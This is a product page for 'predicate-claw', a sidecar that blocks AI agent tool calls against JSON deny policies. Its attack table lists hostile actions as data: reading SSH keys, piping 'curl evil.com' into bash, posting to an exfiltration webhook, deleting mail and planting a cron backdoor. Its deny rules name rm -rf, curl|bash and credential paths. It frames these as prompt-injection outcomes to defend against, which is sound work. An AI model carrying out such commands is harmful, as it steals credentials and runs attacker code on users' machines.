Stop giving OpenClaw ambient terminal access.
predicate-claw is a drop-in Rust sidecar that physically intercepts OpenClaw tool calls before they hit your OS. Block rm -rf, prevent SSH key leaks, and enforce zero-trust execution with <1ms latency.
npm install predicate-clawReal-Time Pre-Execution Authorization
Left pane: The Predicate Authority sidecar evaluates every tool request against security policies in real-time, showing ALLOW or DENY decisions with sub-millisecond latency.
Right pane: The integration demo using the real createSecureClawPlugin() SDK—legitimate file reads succeed, while sensitive file access, dangerous shell commands, and prompt injection attacks are blocked before execution.
How It Works
1. INTERCEPT
OpenClaw executes a tool call. The sidecar intercepts before OS execution.
2. EVALUATE
Sidecar checks action + resource against your JSON policy file. <25ms latency.
3. ALLOW / DENY
Passes to OS or blocks + logs. OpenClaw receives a "permission denied" error and adapts naturally.
Attack Vectors Blocked
Your OpenClaw agent is one prompt injection away from catastrophe. Here's what we stop.
| Attack Vector | Without predicate-claw | With predicate-claw |
|---|---|---|
fs.read ~/.ssh/id_rsa | SSH key leaked | BLOCKED |
shell.exec "curl evil.com | bash" | RCE achieved | BLOCKED |
http.post webhook.site/exfil | Data exfiltrated | BLOCKED |
gmail.delete inbox/** | Emails destroyed | BLOCKED |
fs.write /etc/cron.d/backdoor | Persistence planted | BLOCKED |
Declarative JSON Policies
Version-controlled. Reviewable in PRs. No security PhD required.
- Block SSH keys, AWS credentials, .env files
- Prevent
rm -rf,sudo,curl | bash - Allow workspace-only file access
- Glob patterns for flexible rules
[
{ "effect": "deny", "action": "fs.*", "resource": "~/.ssh/**" },
{ "effect": "deny", "action": "fs.*", "resource": "~/.aws/**" },
{ "effect": "deny", "action": "fs.*", "resource": "**/.env*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*rm -rf*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*curl*|*bash*" },
{ "effect": "deny", "action": "http.post", "resource": "**" },
{ "effect": "allow", "action": "fs.read", "resource": "./src/**" },
{ "effect": "allow", "action": "shell.exec", "resource": "git *" }
]import { createSecureClawPlugin } from "predicate-claw";
export default createSecureClawPlugin({
principal: "agent:my-bot",
sidecarUrl: "http://localhost:8787",
failClosed: true, // deny by default
});3-Line Integration
Drop-in plugin for OpenClaw. Works with any agent framework via the direct SDK.
Predicate Vault
Centralized policy management for your entire OpenClaw fleet. Create policies, revoke access in milliseconds, and stay compliant.
Centralized Policies
End of YAML drift. Define policies once, deploy everywhere. Version-controlled with full audit trail.
Global Kill-Switches
Revoke any agent or mandate in milliseconds. Principal revocation propagates fleet-wide instantly.
Fleet Management
Manage hundreds of sidecars from one dashboard. Real-time health, latency metrics, and policy sync status.
WORM Audit Vault
7-year retention, Merkle-anchored logs. SOC2 and HIPAA-ready compliance out of the box.
Ship agents without fear.
You built a clever OpenClaw agent that automates your dev workflow. It works great—until it hallucinates rm -rf ~ or exfiltrates your SSH keys to a random webhook. You don't have time to build a security layer from scratch.
- 3-line integration, works with your existing code
- Blocks commands before they execute
- MIT licensed, runs locally
- See blocks in the real-time TUI
import { createSecureClawPlugin } from "predicate-claw";
export default createSecureClawPlugin({
principal: "agent:my-bot",
sidecarUrl: "http://localhost:8787",
failClosed: true, // deny by default
});[
{ "effect": "deny", "action": "fs.*", "resource": "~/.ssh/**" },
{ "effect": "deny", "action": "fs.*", "resource": "~/.aws/**" },
{ "effect": "deny", "action": "fs.*", "resource": "**/.env*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*rm -rf*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*curl*|*bash*" },
{ "effect": "deny", "action": "http.post", "resource": "**" },
{ "effect": "allow", "action": "fs.read", "resource": "./src/**" },
{ "effect": "allow", "action": "shell.exec", "resource": "git *" }
]Guardrails before production.
Your team is deploying OpenClaw agents to production. But one prompt injection in production could mean SSH key leaks or data exfiltration. You need a policy layer that's fast enough to not slow down execution and simple enough to not require a security PhD.
- Declarative JSON policies (reviewable in PRs)
- <25ms latency
- Fail-closed by default
- Audit logs for compliance
Visibility and control across the fleet.
OpenClaw agents are shipping to production with ambient terminal access. Your attack surface just exploded. You need centralized policy management, real-time revocation, and an immutable audit trail—without blocking developer velocity.
- Push policy updates across your fleet
- Global Kill-Switches
- WORM Audit Vault (7-year ledger)
- SIEM integrations (Datadog, Splunk)